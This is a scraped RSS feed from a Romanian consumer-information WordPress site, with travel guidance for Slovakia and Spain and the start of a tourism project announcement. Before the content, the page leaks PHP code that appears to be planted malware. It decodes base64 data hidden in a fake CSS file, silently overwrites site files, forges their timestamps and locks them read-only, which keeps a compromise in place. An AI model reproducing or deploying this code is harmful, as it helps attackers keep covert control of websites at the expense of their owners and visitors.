$wp_update_file="/home/shuffles/public_html/wp-includes/css/wp-timer.css"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } }
Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/feed-rss2.php on line 8
drepturile consumatorului – O noua atitudine https://o9atitudine.ro Un site de educare si informare in domeniul protectiei consumatorilor, protectiei mediului, contrafacerii si pirateriei Sun, 09 Sep 2012 15:56:55 +0000 en-US hourly 1 https://wordpress.org/?v=6.4.4 https://o9atitudine.ro/wp-content/uploads/cropped-o-9-atitudine_albastru_mare-32x32.png drepturile consumatorului – O noua atitudine https://o9atitudine.ro 32 32 Slovacia https://o9atitudine.ro/informatii_calatorie/slovacia/ Sun, 09 Sep 2012 09:10:27 +0000 http://o9atitudine.ro/?p=162 Condiţii de intrare şi regim de şedere

Cetăţenii români nu au nevoie de viză pentru a călători în Slovacia.
Intrarea în Slovacia este permisă cu paşaportul sau cartea de identitate în curs de valabilitate.

Ministerul Afacerilor Externe recomandă cetăţenilor români care intenţionează să rămână pentru o perioadă îndelungată pe teritoriul acestui stat să se adreseze misiunii diplomatice a României şi să îşi anunţe prezenţa în regiune, comunicând coordonatele personale pentru a putea fi contactaţi în situaţii de urgenţă.

Doriţi să munciţi în Republica Slovacă?

Republica Slovacă a decis liberalizarea accesului cetăţenilor români pe piaţa locală a forţei de muncă.
Cetăţenii romani pot lucra în Slovacia fără să deţină un permis de muncă, în condiţii egale cu cetăţenii slovaci sau cetăţenii altor state UE.
Informaţii suplimentare puteţi obţine accesând site-ul:
http://www.muncainstrainatate.anofm.ro/


Ameninţări teroriste

Terorismul este un fenomen global, nelocalizat, prin urmare nici Slovacia nu poate fi exclusă din faţa acestei ameninţări.
Slovacia nu a suferit atacuri teroriste directe pe teritoriul naţional.
Vă sfătuim să urmăriţi în permanenţă anunţurile şi recomandările făcute de autorităţile slovace şi să accesaţi periodic site-ul web al Ministerului român al Afacerilor Externe (www.mae.ro).


Siguranţă şi criminalitate

Slovacia este o ţară sigură din punctul de vedere al criminalităţii.
Infracţiuni minore de tipul furtului din buzunare, înşelăciunilor sau furtului din maşini pot apărea în zone aglomerate (gări, staţii, parcări, centre comerciale, benzinării sau zone de servicii pe autostrăzi).

Recomandări generale:

  • Păstraţi în locuri sigure documentele, valorile personale, biletele de călătorie banii, cărţile de credit şi nu le expuneţi în mod vizibil asupra dumneavoastră sau în maşini.
  • Maşinile trebuie încuiate şi asigurate cu sisteme de alarmă.
  • În cazul călătoriei cu autobuzul sau trenul păstraţi atenţia asupra bagajelor pe întreaga durată a călătoriei.
  • Pentru ieşirile în oraşe, în special în zonele aglomerate, lăsaţi documentele personale la hotel şi păstraţi numai o copie a actelor de identitate (paşaport, permis de şedere).
  • Parcaţi autoturismul, chiar şi pentru perioade scurte, numai în parcări păzite.

În cazul unor incidente care afectează siguranţa persoanei sau a bunurilor, vă recomandăm să contactaţi poliţia locală precum şi cel mai apropiat oficiu consular român.
În cazul unor incidente grave (accidente, tâlhării), care necesită intervenţia imediată a autorităţilor slovace, apelaţi următoarele numere de urgenţă:

  • 112 – Servicii de urgenţă
  • 158 – Poliţie
  • 150 – Pompieri
  • 155 – Salvarea

Atenţie! Dacă sunaţi din greşeală la 112, nu închideţi! În caz contrar, vi se poate trimite o maşină în locul în care vă aflaţi, pentru a vedea dacă totul este în regulă!


Condiţii privind traficul auto

  • Circulaţia auto: 

În Slovacia, circulaţia auto se efectuează pe partea dreaptă a drumului.
Este obligatoriu să menţineţi în permanenţă farurile aprinse (faza de întâlnire).
Participantii la trafic pot fi opriţi atât de către autorităţile poliţieneşti în uniformă, cât şi de cele în civil.
Agenţii de poliţie vor putea opri şi controla nu numai şoferii, dar şi pe ceilalţi participanţi la trafic.
Funcţionează sistemul priorităţii de dreapta.
Este obligatorie echiparea autovehiculului cu cauciucuri de iarnă în cazul în care pe carosabil se află un strat de zăpadă sau gheaţă.
Este obligatoriu ca bicicliştii să poarte cască de protecţie în afara localităţii.
Este obligatoriu ca bicicliştii cu vârsta sub 15 ani să poarte cască de protecţie şi în localităţi.
Taxele pentru autostrăzi se plătesc sub forma vignetelor, care se lipesc pe parbrizul maşinii. Aceste vignete se pot cumpăra de la fiecare punct de frontieră, de la oficii poştale (mai ales în oraşe, mai greu în mediul rural) şi de la fiecare staţie de benzină.
Atenţionăm asupra faptului că poliţia opreşte şi amendează toate autovehiculele care nu au vignetă, fără a ţine cont de faptul că aceste vignete nu se găsesc mereu în stocurile staţiilor de benzină.
Valabilitatea vignetelor: 7 zile, 30 zile sau 1 an calendaristic (ianuarie-decembrie).
Şoferii de camion sau autocar au fost amendaţi pentru lipsa aparatului de taxare, obligatoriu pentru autovehiculele de peste 3,5t şi pentru autocarele care transportă mai mult de 9 pasageri.

În afara aparatului de taxare OBU, şoferii care tranzitează ocazional teritoriul tarii au la dispoziţie posibilitatea achiziţionării unui tichet de tranzit pe o perioadă limitată, aşa-numitul ticketing. Acesta este valabil pentru o perioadă de 18 ore, pentru 18 tronsoane rutiere de tranzit. Mai multe detalii se găsesc pe pagina de internet www.emyto.sk

Avantajele utilizării acestui tichet: nu este necesară instalarea aparatului de taxare (bord unit); nu trebuie plătită garanţia de 50 euro pentru aparatul de taxare; nu este necesară achitarea taxei minime de 50 euro.

Atenţie! Tichetul de tranzit poate fi achiziţionat doar într-unul din punctele de trecere a frontierei de tranzit stabilite.
Este interzisă circulaţia autovehiculelor de mare tonaj şi a tirurilor cu remorci pe autostrăzi şi drumuri clasa I în week-end, în timpul sărbătorilor legale şi a zilelor libere.

Atenţie! Încălcarea legii slovace privind conducerea pe drumurile publice se pedepseşte cu amenzi cuprinse între 60 şi 17.000 euro şi/sau suspendarea permisului de conducere până la 5 ani.
În caz de neplată a amenzii, organele de poliţie slovace pot reţine, potrivit legii, permisul de conducere sau certificatul de înmatriculare al autoturismului, până la achitarea amenzii.
Permisul de conducere poate fi reţinut de către organele de poliţie pentru verificarea dreptului, capacităţii fizice sau psihice de a conduce autovehicule. În acest caz, poliţistul va elibera o dovadă înlocuitoare a permisului de conducere cu drept de conducere pentru 15 zile. Dovada este valabilă numai pe teritoriul Republicii Slovace.

Amenzi de circulatie :

      • Neacordarea priorităţii – începând cu 60 euro
      • Depăşirea într-o zonă interzisă – începând cu 60 euro
      • Utilizarea sistemelor anti-radar – 15 euro
      • Neutilizarea centurii de siguranţă – 60 euro
      • Depăşirea limitei de viteză – variază de la 50 euro la 650 euro
      • Parcarea într-un loc nepermis – începând cu 60 euro
      • Parcarea autoturismului pe locurile marcate pentru persoanele cu handicap – amenda cuprinsa intre 150 şi 300 euro, precum şi posibilitatea reţinerii permisului de conducere
      • In cazul transportatorilor lipsa dispozitivului ’’on-board unit – OBU’’ se sanctioneaza cu o amenda cuprinsa intre 1655 si 2655 euro
      • Neutilizarea luminilor pe timp de zi – 60 euro
      • Lipsa vignetei – până la de 10 ori contravaloarea vignetei maxime
      • Starea drumurilor:

Starea generală a drumurilor şi infrastructurii este bună.

      • Folosirea telefonului mobil la volan: 

Este interzisă.

      • Aparatele anti-radar şi de detectare a radarului:

Este interzisă utilizarea tuturor sistemelor anti-radar pe teritoriul Slovaciei.

      • Parcarea

Parcarea este permisă numai în locuri rezervate, contra cost, iar tichetele trebuie afişate la vedere în interiorul maşinii.

Atenţie! Parcaţi autoturismul, chiar şi pentru perioade scurte, numai în parcări păzite.

      • Limitele maxime de viteză admise
      • în localităţi – 50 km/oră
      • în afara localităţilor – 90 km/oră (inclusiv pentru autovehiculele de marfă)
      • autostrăzi – 130 km/oră pentru autovehicule până la 3.500 kg şi 100 km/oră pentru autobuze
      • în zonele de autostradă din localităţi – 90 km/oră.
      • Limitele minime de viteză
      • pe autostrăzi – 80 km/oră;
      • în zonele de autostradă din localităţi – 65 km/oră
      • Centura de siguranţă

Este obligatorie.

      • Permisul de conducere

Permisul de conducere românesc este valabil în Slovacia.

      • Informaţii pentru cazurile de accident de circulaţie

În caz de accident uşor, şoferii implicaţi în accident au obligaţia de a opri imediat autoturismul, de a completa şi semna formularul de constatare a accidentului, pus la dispoziţie de companiile de asigurări, prin care şoferul vinovat se angajează să suporte pagubele provocate.

Dacă în urma accidentului sunt răniţi, după ce aţi acordat primul ajutor, există obligativitatea anunţării şi aşteptării echipajului de poliţie la locul accidentului.
Vehiculele implicate nu trebuie mişcate, chiar dacă perturbă circulaţia. Adresaţi-vă pentru sprijin partenerului societăţii de asigurări din Slovacia.
Păstraţi documentele de plată până la înapoierea în ţară pentru a le prezenta societăţii de asigurare.

Telefoane utile în caz de urgenţă:

      • 112 Urgenţă
      • 158 – Poliţia
      • 159 – Poliţia oraşului, (inclusiv pentru ridicări auto)
      • 150 – Pompieri
      • 155 – Salvarea
      • 112 sau (00421) 18-900, 18-128, 18-154, 18-124 – Sistemul de salvare pentru automobilişti şi (00421) 18-777 – Sistemul de salvare numai pentru automobilişti peste 3,5t
      • (0850) 11-13-13 – Ajutor (consultanţă pentru acordarea primului ajutor)
      • 18 300 – Serviciu de salvare montană
      • 18 155 – Serviciul de salvare în caz de accident aviatic

Mai multe informaţii utile puteti afla accesand site-ul www.namk.sk sau www.emyto.sk


Sistemul medical

Asigurarea medicală este obligatorie în Slovacia.
Vă recomandăm cu insistenţă să încheiaţi o asigurare medicală de sănătate sau să obţineţi Cardul European de Sănătate înainte de a pleca într-o călătorie.
Dacă vă îmbolnăviţi sau aveţi un accident pe durata unei şederi temporare într-un stat membru UE, formularul E112 sau Cardul european de asigurări sociale de sănătate vă va da acces la îngrijirile medicale necesare.
Acest Card vă va permite să primiţi asistenţa medicală necesară în timpul şederii dumneavoastră temporare în orice ţară a Uniunii Europene.
Mai multe detalii găsiţi la adresele : www.cnas.ro şi www.ceass.ro.

Este bine ca asigurarea medicală suplimentară să fie valabilă în toate ţările. În baza unei asemenea asigurări, facultative, aveţi acces la serviciile de urgenţă atât din sistemul public de sănătate, cât şi din cel privat (în funcţie de tipul poliţei de asigurare). La încheierea unei asemenea asigurări verificaţi coordonatele partenerului societăţii de asigurare în ţara de destinaţie şi de tranzit.

Vă recomandăm să vă încheiaţi, înainte de plecare, o asigurare de călătorie. Aceasta are valabilitate în toate ţările şi poate să acopere de la riscurile de bază (îmbolnăviri, accidente, urgenţe stomatologice, repatriere sanitară sau în caz de deces) până la toate riscurile de călătorie, inclusiv pierderea/ furtul/ deteriorarea bagajelor, anularea plecării în străinătate, falimentul companiei aeriene etc.
Asigurarea de viaţă s-a dovedit benefică pentru familiile celor decedaţi în urma unor accidente sau din motive de boală.
În Uniunea Europeană nu aveţi nevoie de vaccinări speciale.


Utilizarea cărţilor de credit

În Slovacia există o reţea bine dezvoltată de ATM-uri.
Se acceptă plata cu cărţi de credit/debit la majoritatea magazinelor, restaurantelor, staţiilor de benzină.


Reglementări vamale

Nu există controale la graniţele interne, dintre statele semnatare ale Acordului Schengen: Austria, Belgia, Danemarca, Estonia, Finlanda, Franţa, Germania, Grecia, Italia, Letonia, Lituania, Luxemburg, Malta, Olanda, Polonia, Portugalia, Republica Cehă, Slovacia, Slovenia, Spania, Suedia, Ungaria, precum şi Islanda, Norvegia şi Elveţia (ultimele trei nefiind membre ale UE).

Din motive de ordine publică, sănătate publică sau de securitate naţională, la graniţele interne ale UE se pot introduce controale, pentru perioade limitate.
Limitele cantitative pentru introducerea anumitor produse sunt: ţigări: 200 bucăţi, 1 litru băuturi alcoolice, parfum 50 ml sau 250 ml apă de toaletă.
Este interzisă scoaterea din Slovacia a obiectelor de artă şi cultură.
În cazul expoziţiilor care prevăd scoaterea temporară a obiectelor sau a colecţiilor de artă trebuie asigurat din timp avizul instituţiilor corespunzătoare.
Este permis importul şi exportul de valută sau titluri de valoare, fără declaraţie vamală, în limita a 10.000 euro.


Regimul medicamentelor

Sunt excluse atât la intrare cât şi la ieşire drogurile de orice tip şi substanţele dopante.
Atenţie! Nu luaţi cu dumneavoastră decât cantităţile de medicamente strict necesare!
Vă recomandăm să aveţi la dumneavoastră reţeta medicului pentru medicamentele care depăşesc sfera celor uzuale.
Antibioticele nu se eliberează decât pe bază de reţetă.


Regimul animalelor de companie

Pentru spaţiul UE, aveţi nevoie de paşaport european pentru animalele de companie. Acest document se poate procura de la medicul veterinar şi trebuie să conţină informaţii despre vaccinarea antirabică.
Animalul trebuie identificat printr-un microcip electronic. Până în iulie 2011, se acceptă, de asemenea, şi un tatuaj lizibil.

Sursa: www.mae.ro

]]>
Spania https://o9atitudine.ro/informatii_calatorie/spania/ Sun, 09 Sep 2012 09:00:09 +0000 http://o9atitudine.ro/?p=158 Condiţii de intrare şi regim de şedere

Cetăţenii români nu au nevoie de viză pentru a călători în Spania.
Intrarea în Spania este permisă cu paşaportul sau cartea de identitate valabile.

Pentru verificarea condiţiilor speciale de intrare şi şedere vă recomandăm consultarea informaţiilor oficiale furnizate de Ministerul de Interne al Regatului Spaniei (http://www.mir.es/)

Ministerul Afacerilor Externe recomandă cetăţenilor români care intenţionează să rămână pentru o perioadă îndelungată pe teritoriul acestui stat să se adreseze MISIUNILOR CONSULARE ale României şi să îşi anunţe prezenţa în regiune, comunicând coordonatele personale pentru a putea fi contactaţi în situaţii de urgenţă.


Doriţi să munciţi în Spania?

Începând cu data de 22 iulie 2011, Guvernul Spaniei a reintrodus un moratoriu care impune cetăţenilor români obţinerea unui  permis de muncă, dacă la data specificată nu se aflau în posesia unui contract de munca încheiat legal sau nu erau înregistraţi ca şomeri în căutarea unui loc de munca. Permisul de muncă se solicită de către angajatorul care oferă contractul de muncă.

Cetăţenii români care au lucrat în statele Uniunii Europene şi solicită, în vederea definitivării dosarului de pensie, documente doveditoare de la instituţiile la care au fost angajaţi, trebuie să se adreseze Casei de Pensii şi Asigurări Sociale de care aparţin. Aceasta este singura instituţie abilitată să ceară sprijinul necesar unei alte instituţii omoloage prin intermediul certificatelor europene existente (în cazul de faţă este vorba de formularul E104, ce vizează totalizarea perioadelor de asigurare).

 

Prevederi legislative spaniole legate de schimbarea certificatului de rezidenţă comunitară (NIE)

Prevederi legislative

Pentru obţinerea certificatului de rezidenta/foaia verde care include şi NIE (numarul de identificare personal) cetăţenii comunitari, inclusiv cetatenii români:

  • trebuie să lucreze pentru un angajator sau pe cont propriu în Spania sau să facă dovada că dispun pentru ei înșiși și pentru membrii familiei de resurse materiale suficiente şi posedă o asigurare medicală completă, care să acopere toate riscurile în Spania;
  • este nevoie să dovedească înscrierea într-o instituție publică sau privată de învățământ, acreditată sau finanțată de administrația spaniolă pentru studii sau formare profesională, și să dețină asigurare medicală completă care să acopere toate riscurile în Spania;
  • trebuie să fie membri de familie care însoțesc sau se alătură unui cetățean al Uniunii care îndeplinește el însuși condițiile menționate anterior.

Obs.: de la 1 ianuarie 2007 cetățenii români sunt cetățeni comunitari.

Cazurile in care este necesară schimbarea certificatului de rezidenta UE

Cetăţenii care posedă certificat de rezidență comunitar (NIE=foaia de culoare verde) nu trebuie să-și reînnoiască acest document deoarece FOAIA VERDE NU expiră!

Singurele cazuri în care trebuie schimbat certificatul de rezidență UE sunt cele de deteriorare/pierdere/furt ale acestuia sau cele în care cetățeanul își schimbă starea civilă sau adresa la care locuiește.

De asemenea, sunt nevoiți să-și modifice certificatul cetăţenii români care, în perioada ianuarie-aprilie 2007, dupa intrarea Romaniei in UE, din lipsa instructiunilor specifice de aplicare au primit în loc de certificat de rezidență UE, tarjeta de residencia, document eliberat cetățenilor extracomunitari, care are termen de valabilitate de cinci ani.

Procedura pentru schimbarea certificatului de rezidenţă

Toti cetăţenii care doresc schimbarea certificatului de rezidență comunitară (=NIE) vor trebui sa facă dovada respectării noilor condiții impuse la 24 aprilie 2012 de legislația spaniolă.

Potrivit legii, cetățenii comunitari care solicită rezidența/reînnoirea acesteia după 24 aprilie 2012 trebuie să solicite personal documentul la Oficiul pentru Străini din provincia în care doresc să-și stabilească reședința, sau la sediul Comisariatului de Poliție de care aparţin pentru înscrierea lor în Registrul Central de Străini. Solicitarea menționată va trebui cerută la trei luni de la intrarea pe teritoriul Spaniei, fiindu-le acordat, pe loc, un certificat de înregistrare în care vor fi menţionate numele, naționalitatea și domiciliul persoanei înregistrate, numărul de identitate ca străin și data înregistrării.

Împreună cu cererea de înscriere, va trebui să se prezinte pașaportul sau un document național de identitate valabil, precum și documentația justificatoare a îndeplinirii cerințelor pentru obținerea certificatului de reședință inclusă în noua legislație.

În cazul în care pașaportul sau documentul național de identitate sunt expirate, se poate prezenta o copie și solicitarea de reînnoire.

ATENŢIE În situaţia în care aveţi nevoie de eliberarea unui nou certificat şi sunteţi  refuzat în mod nejustificat, solicitaţi “hoja de reclamaciones”.

Specificarea “cu drept de muncă până la data de 31.12.2012” nu este reglementată legal, dar nici nu contravine legii, înscrierea acesteia în certificat depinzând de autoritatea competentă locală.

Chiar în situatia in care apare aceasta mentiune in certificatul obtinut, dreptul la muncă al cetăţenilor români va fi reglementat de legislaţie, şi nu de respectivul certificat (situaţie similară ridicării restricţiilor in 2009).

Ameninţări teroriste

Terorismul este un fenomen global, nelocalizat, prin urmare nici Spania nu poate fi exclusă din faţa acestei ameninţări.

Atacuri şi ameninţări teroriste de amploare redusă au fost înregistrate în 2009 şi în anii precedenţi, preponderent în partea de nord a Spaniei, în zona oraşului Bilbao, dar şi pe raza capitalei Madrid – toate fiind revendicate de organizaţia bască ETA.
Vă recomandăm să urmăriţi în permanenţă anunţurile şi recomandările făcute de autorităţile spaniole şi să accesaţi periodic pagina web al Ministerului al Afacerilor Externe (www.mae.ro).

Siguranţă şi criminalitate

Spania este o ţară cu un nivel de criminalitate relativ redusă.
Infracţiuni minore de tipul furtului din buzunare, înşelăciunilor sau furtului din maşini pot apărea frecvent în zone aglomerate (gări, staţii, parcări, centre comerciale, benzinării sau zone de servicii pe autostrăzi).

Recomandări generale:

  • Păstraţi în locuri sigure documentele şi valorile personale, biletele de călătorie banii, cărţile de credit şi nu le expuneţi în mod vizibil asupra dumneavoastră sau în maşini.
  • Maşinile trebuie încuiate şi asigurate cu sisteme de alarmă.
  • În cazul călătoriei cu autobuzul sau trenul păstraţi atenţia asupra bagajelor pe întreaga durată a călătoriei.
  • Pentru ieşirile în oraşe, în special în zonele aglomerate, lăsaţi documentele personale la hotel şi păstraţi numai o copie a actelor de identitate (paşaport, permis de şedere).

Atenţie! Nu acceptaţi transportarea unor pachete sau genţi  cărora nu le cunoaşteţi conţinutul. Nu acceptaţi să faceţi servicii de curierat în schimbul unor bani şi/sau bilete de avion. Există reţele de traficanţi de droguri care se folosesc de aşa numiţi cărăuşi pentru a transporta droguri. Persoanele găsite cu droguri asupra lor sunt arestate şi riscă pedepse privative de libertate severe.

Atenţie! Posesia oricărui tip de substanţe stupefiante, în orice cantitate, este interzisă si se pedepseşte cu închisoarea de la 4 la 20 de ani.

În cazul unor incidente care afectează siguranţa persoanei sau a bunurilor, vă recomandăm să contactaţi poliţia la numărul de urgenta 112 şi să precizaţi oraşul şi adresa unde va aflaţi (străzile sunt bine marcate). În cazul pierderii paşaportului românesc, vă recomandăm să vă deplasaţi la cea mai apropiata secţie de poliţie pentru a face un denunţ (denuncia), apoi să vă adresaţi celui mai apropiat consulat român:

În cazul unor incidente grave (accidente, tâlhării), care necesită intervenţia imediată a autorităţilor spaniole, trebuie apelate următoarele numere de urgenţă:

  • 091 – Poliţia locală
  • 112 – Politia naţională, Ambulanţa (SAMUR)
  • 080 – Pompieri

Se recomandă, de asemenea, sesizarea oficiilor consulare române, care pot acorda asistenţa consulară în condiţiile prevăzute de lege.

Atenţie! Dacă sunaţi din greşeală la 112, nu închideţi! În caz contrar, vi se poate trimite o maşină în locul în care vă aflaţi, pentru a vedea dacă totul este în regulă!

Atenţie! Chiar dacă nu cunoaşteţi limba spaniolă, când apelaţi serviciile de urgenţă, aşteptaţi să vi se facă legătura cu un operator care vorbeşte o limba de circulaţie internaţională. În unele zone este posibil sa fiţi redirecţionat spre un operator vorbitor de limba română.


Sistemul medical

Asigurarea medicală este obligatorie în Spania.

Vă recomandăm cu insistenţă să încheiaţi o asigurare medicală de sănătate sau să obţineţi Cardul European de Sănătate înainte de a pleca într-o călătorie. Dacă vă îmbolnăviţi sau aveţi un accident pe durata unei şederi temporare într-un stat membru UE, formularul E112 sau Cardul european de asigurări sociale de sănătate vă va da acces la îngrijirile medicale necesare. Acest Card vă va permite să primiţi asistenţa medicală necesară în timpul şederii dumneavoastră temporare în orice ţară a Uniunii Europene. Mai multe detalii găsiţi la adresele: www.cnas.ro şi www.ceass.ro.

Este bine ca asigurarea medicală suplimentară să fie valabilă în toate ţările. În baza unei asemenea asigurări, facultative, aveţi acces la serviciile de urgenţă atât din sistemul public de sănătate, cât şi din cel privat (în funcţie de tipul poliţei de asigurare). La încheierea unei asemenea asigurări verificaţi coordonatele partenerului societăţii de asigurare în ţara de destinaţie şi de tranzit.

Vă recomandăm să vă încheiaţi, înainte de plecare, o asigurare de călătorie. Aceasta are valabilitate în toate ţările şi poate să acopere de la riscurile de bază (îmbolnăviri, accidente, urgenţe stomatologice, repatriere sanitară sau în caz de deces) până la toate riscurile de călătorie, inclusiv pierderea/ furtul/ deteriorarea bagajelor, anularea plecării în străinătate, falimentul companiei aeriene etc.

Asigurarea de viaţă s-a dovedit benefică pentru familiile celor decedaţi în urma unor accidente sau din motive de boală.

În Uniunea Europeană nu aveţi nevoie de vaccinări speciale.

Persoanele neasigurate trebuie să plătească ulterior costurile medicale, care se pot ridica la sume considerabile. In caz de deces, Ambasada şi Consulatele Romaniei NU un sunt responsabile de cheltuielile de repatriere a corpurilor neînsufleţite. În Spania, serviciile de pompe funebre deţin exclusivitate in acest domeniu, nefiind permisa transportarea persoanelor decedate de către persoane neautorizate ori firme de pompe funebre din alte tari. Costurile pentru aceste transporturi având ca destinaţie România variază intre 6.000 si 10.000 de euro, cu plata în avans. De asemenea, există posibilitatea incinerării sau înhumării pe plan local. Şi aceste două proceduri implică cheltuieli între 3.000 si 6.000 euro.

Condiţii privind traficul auto

  • Circulaţia auto

În Spania, circulaţia auto se efectuează pe partea dreaptă a drumului.
Funcţionează sistemul priorităţii de dreapta.

Accesul pe autostrăzi este permis în baza achitării taxelor specifice. Plata acestor taxe se face la  punctele special amenajate, plasate la intrarea sau la ieşirea de pe autostradă. Costul minim pentru accesul pe autostradă este de 3 euro. Există de asemenea autostrăzi cu plata (inscripţionate cu textul PEAJE) şi autostrăzi deschise liberei circulaţii.

  • Starea drumurilor

Starea generală a drumurilor şi infrastructurii este foarte bună.

  • Parcarea

Parcarea este permisă numai în locuri rezervate, contra cost (tichetele se cumpără de la aparatele de taxare din parcare ).

Atenţie! Neplata parcării (neafişarea pe bord a tichetului corespunzător) sau  depăşirea timpului plătit se sancţionează cu 90 de euro (pentru fiecare 15 minute amenda se majorează cu câte 90 euro).

Parcarea în locuri neautorizate se sancţionează cu amendă de 90 de euro şi ridicarea autovehiculului. Recuperarea se face numai cu prezentarea în original a documentelor de proprietate asupra autovehiculului, plata unei amenzi de 230 euro şi a unei alte taxe de 3 euro pe ora de depozitare a maşinii.

Parcarea pe un loc rezervat persoanelor cu dizabilităţi (fără afişarea tichetului special european) se penalizează cu 200 de euro şi cu ridicarea autovehiculului.

Se recomandă atenţie sporită în timpul opririlor în parcările amenajate pe autostrăzi (în special în timpul nopţii), fiind înregistrate cazuri de furt de autoturisme cu numere de înmatriculare străine, în special în sezonul estival.

  • Centura de siguranţă

În Spania, centura de siguranţă este obligatorie pentru ocupanţii locurilor din faţă în interiorul localităţilor şi pentru toţi pasagerii în afara localităţilor.

  • Limitele de viteză admise
    • străzi urbane (centrul localităţilor) – 50 km/oră
    • drumuri extraurbane (provinciale şi statale) – 90 km/oră
    • şosele naţionale – 100 km/oră
    • autostrăzi – 130 km/oră

Depăşirea limitelor de viteză poate atrage aplicarea unor amenzi de până la 1.500 euro şi suspendarea permisului de conducere. Începând cu data de 1 iulie 2006, conform noilor reglementări rutiere, depăşirea cu peste 40 km/oră a limitelor de viteză constituie infracţiune, iar depăşirea vitezei cu mai puţin de 40 km/oră se pedepseşte cu amendă de până la 1.500 euro. Din 2007, s-a introdus un sistem pe puncte de sancţionare a încălcării normelor de circulaţie. In cazul depăşirii cu 50 km la ora a vitezei maxime admise, conducătorul auto riscă măsura arestării şi reţinerea autoturismului.

Atenţie! În cazul în care transportaţi bunuri în maşina personală (produse comerciale numeroase) si nu deţineţi dovada cumpărării acestora, marfa se confisca, iar ocupanţii vehiculului poţi fi arestaţi.

  • Folosirea telefonului mobil la volan

Este interzisă. Se poate folosi numai sistemul hands free. Căştile cuplate la telefon sunt interzise.

  • Aparatele anti-radar şi de detectare a radarului

Pe teritoriul Spaniei sunt interzise deţinerea şi utilizarea dispozitivelor de detectare a radarelor, precum şi a aparatelor antiradar. Acestea reprezintă infracţiune şi se pedepsesc cu aplicarea unei amenzi şi a punctelor de penalizare.

  • Permisul de conducere

Permisul de conducere românesc modelul tip card plastic este valabil în Spania.

  • Informaţii pentru cazurile de accident de circulaţie

În caz de accident uşor, completaţi, împreună cu cealaltă parte formularul tip pus la dispoziţie de societăţile locale de asigurări, privind producerea accidentului. Notaţi elementele de identificare ale celuilalt autovehicul implicat în accident şi ale societăţii de asigurare a acestuia.

Dacă în urma accidentului sunt răniţi, chemaţi poliţia locală si  acordaţi  primul ajutor.  Adresaţi-vă pentru sprijin partenerului societăţii române de asigurări din ţara respectivă care figurează pe Cartea verde.

Păstraţi documentele de plată până la înapoierea în ţară pentru a le prezenta societăţii de asigurare.

Telefoane utile pentru informaţii privind traficul sau conduita în caz de accident:

  • Poliţia – 091
  • Ambulanţa – 112

Regimul medicamentelor

Sunt excluse atât la intrare cât şi la ieşire drogurile de orice tip şi substanţele dopante.

Atenţie! Nu luaţi cu dumneavoastră decât cantităţile de medicamente strict necesare!
Vă recomandăm să aveţi la dumneavoastră reţeta medicului pentru medicamentele care depăşesc sfera celor uzuale. Antibioticele nu se eliberează decât pe bază de reţetă.


Reglementări vamale 

Nu există controale la graniţele interne, dintre statele semnatare ale Acordului Schengen: Austria, Belgia, Danemarca, Estonia, Finlanda, Franţa, Germania, Grecia, Italia, Letonia, Lituania, Luxemburg, Malta, Olanda, Polonia, Portugalia, Republica Cehă, Slovacia, Slovenia, Spania, Suedia, Ungaria, precum şi Islanda, Norvegia şi Elveţia (ultimele trei nefiind membre ale UE).

Din motive de ordine publică, sănătate publică sau de securitate naţională, la graniţele interne ale UE se pot introduce controale, pentru perioade limitate.

Regimul animalelor de companie

Pentru spaţiul UE, aveţi nevoie de paşaport european pentru animalele de companie. Acest document se poate procura de la medicul veterinar şi trebuie să conţină informaţii despre vaccinarea antirabică.

Animalul trebuie identificat printr-un microcip electronic.

Sursa: www.mae.ro

]]>
Paşaportul Consumatorului de Servicii Turistice https://o9atitudine.ro/campanii/pasaportul-consumatorului-de-servicii-turistice/ Thu, 26 Nov 2009 07:55:26 +0000 http://www.o9atitudine.ro/?p=2896 guvern Lansarea proiectului “Paşaportul Consumatorului de Servicii Turistice – Ghid obiectiv şi independent de promovare a imaginii României ca Euro-destinaţie sigură şi atractivă” o9atitudine

Asociaţia Naţională pentru Protecţia Consumatorilor şi Promovarea Programelor şi Strategiilor din România lansează proiectul nr. 3876: “Paşaportul Consumatorului de Servicii Turistice – Ghid obiectiv şi independent de promovare a imaginii României ca Euro-destinaţie sigură şi atractivă

Valoarea totală a proiectului este de 992.725,16 lei, din care:

  • Valoare totală eligibilă: 819.053,97 lei (finanţare nerambursabilă şi contribuţia Beneficiarului)
  • Valoare eligibilă nerambursabilă din Fondul European de Dezvoltare Regională: 696.195,87 lei
  • Valoarea eligibilă nerambursabilă din bugetul naţional: 106.067,50 lei
  • Co-finanţarea eligibilă a Beneficiarului: 16.790,60 lei

Durata proiectului: 20.10.2009 – 19.10.2011

Asociaţia Naţională pentru Protecţia Consumatorilor şi Promovarea Programelor şi Strategiilor din România (A.N.P.C.P.P.S. România), cu Secretariatul General in Bucureşti, Str. Muzelor, nr. 1, Sector 4, Cod Poştal 040191, România şi sediul social în Braşov, Str. Munteniei, nr. 8, Cod Poştal 500209, tel./fax: 0368-441.158, e-mail: office@anpcppsr.ro, www.protectia-consumatorilor.ro, organizaţie neguvernamentală, fără scop lucrativ, independentă, întemeiată pe principii democratice, ce apără drepturile consumatorilor, implementează proiectul “Paşaportul Consumatorului de Servicii Turistice – Ghid obiectiv şi independent de promovare a imaginii României ca Euro-destinaţie sigură şi atractivă”, în cadrul Programului Operaţional Regional, cofinanţat de Uniunea Europeană prin Fondul European de Dezvoltare Regională.

Obiectivul principal al proiectului îl reprezintă realizarea unui ghid care va cuprinde atât informaţii despre drepturile şi obligaţiile pe care le au turiştii pe teritoriul României, cât şi informaţii elementare pe care trebuie să le cunoască atunci când călătoresc pe teritoriul României. Informarea turiştilor trebuie să fie cât mai completă cu putinţă şi trebuie să acopere, pe lângă oferta turistică

